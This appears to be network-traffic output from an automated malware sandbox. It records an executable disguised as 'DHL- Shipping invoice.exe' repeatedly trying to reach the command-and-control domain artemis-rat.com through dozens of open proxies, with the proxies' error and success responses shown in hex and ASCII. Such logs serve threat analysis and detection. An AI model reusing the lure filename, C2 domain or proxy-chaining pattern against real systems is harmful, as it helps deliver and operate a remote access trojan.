                            Mar 12, 2024 08:37:01.930934906 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 f0 06 1d 72 36 3c 23 c1 3e c3 7b 3c 72 2b c6 88 af d4 6b 64 d3 21 db 6a 47 38 a1 df 16 43 ab 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: er6<#>{<r+kd!jG8C*,+0/$#('=<5/Uartemis-rat.com#


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            714192.168.2.449838186.150.207.20780806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.660586119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.749845028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.750494957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.750543118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.916977882 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            715192.168.2.45237352.151.210.20490006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.665301085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            716192.168.2.44987866.228.35.209194976484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.666285992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.750094891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.750499010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.750569105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:25.750006914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:37.751096964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:49.843533039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:13.844906092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:02.031210899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            717192.168.2.452390104.20.75.132806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.667872906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.755976915 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            718192.168.2.45238538.162.1.9531286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.681648016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.015119076 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            719192.168.2.452243187.40.1.1221286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.684250116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.249960899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.062735081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.322335958 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            720192.168.2.45239138.162.25.14331286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.684791088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.988117933 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            721192.168.2.45220380.249.112.162806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.686278105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.926276922 CET343INHTTP/1.1 400 Bad Request
                            Server: nginx/1.14.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 182
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            722192.168.2.45250843.153.171.2044436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.686991930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            723192.168.2.45250943.153.171.2044436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.688035965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            724192.168.2.45251343.153.171.2044436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.689629078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            725192.168.2.45251443.153.171.2044436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.690553904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            726192.168.2.452331174.77.111.19641456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.703999996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            727192.168.2.44978643.255.113.23280846484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.707483053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.071260929 CET208INHTTP/1.0 404 Not Found
                            Server: HCS
                            Date: Tue, 12 Mar 2024 10:24:23 GMT
                            Content-Type: text/html
                            Content-Length: 432
                            HCS-Error: ERR_FTP_NOT_FOUND 0
                            X-NGAA: MISS from CH-XW-NO1-315.4
                            Connection: close


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            728192.168.2.452155102.132.54.6280806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.709602118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            729192.168.2.45218554.178.159.199180806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.721206903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.998822927 CET503INHTTP/1.1 400 Bad Request
                            Content-Type: text/html; charset=us-ascii
                            Server: Microsoft-HTTPAPI/2.0
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Connection: close
                            Content-Length: 324
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            730192.168.2.451441105.235.197.162540666484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.725651979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            731192.168.2.452074117.160.250.16380816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.728511095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.166011095 CET221INHTTP/1.1 403 Access Denied
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Connection: close
                            Cache-Control: no-store
                            Content-Type: text/html
                            Content-Language: en
                            Content-Length: 43
                            Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                            Data Ascii: You are not allowed to access the document.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            732192.168.2.45236720.111.54.16806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.728616953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.889990091 CET319INHTTP/1.1 403 Forbidden
                            Server: squid
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 17
                            X-Squid-Error: ERR_ACCESS_DENIED 0
                            X-Cache: MISS from cdn-fintech.info
                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                            Connection: keep-alive
                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                            Data Ascii: ERR_ACCESS_DENIED


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            733192.168.2.45238072.195.34.60273916484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.731441021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            734192.168.2.449797102.132.38.24680806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.732265949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.750057936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.750494003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.750921965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            735192.168.2.452321185.25.119.15139596484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.806868076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            736192.168.2.452110103.120.6.46806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.806895971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            737192.168.2.45142536.92.193.189806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.807040930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.258003950 CET818INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Server: Apache
                            Vary: accept-language,accept-charset
                            Accept-Ranges: bytes
                            Connection: close
                            Content-Type: text/html; charset=utf-8
                            Content-Language: en
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 53 65 72 76 65 72 20 65 72 72 6f 72 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 69 6e 66 6f 40 72 73 68 62 2d 6c 61 6d 70 75 6e 67 2e 63 6f 2e 69 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 65 72 72 6f 72 21
                            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Server error!</title><link rev="made" href="mailto:info@rshb-lampung.co.id" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/*...*/--></style></head><body><h1>Server error!
                            Mar 12, 2024 08:37:03.258018017 CET461INData Raw: 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 0d 0a 0d 0a 20 20 20 20 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 61 6e 64 20 77 61 73 20 0d 0a 20 20 20 20 75
                            Data Ascii: </h1><p> The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there was an error in a CGI script. </p><p>If you think this is a server err


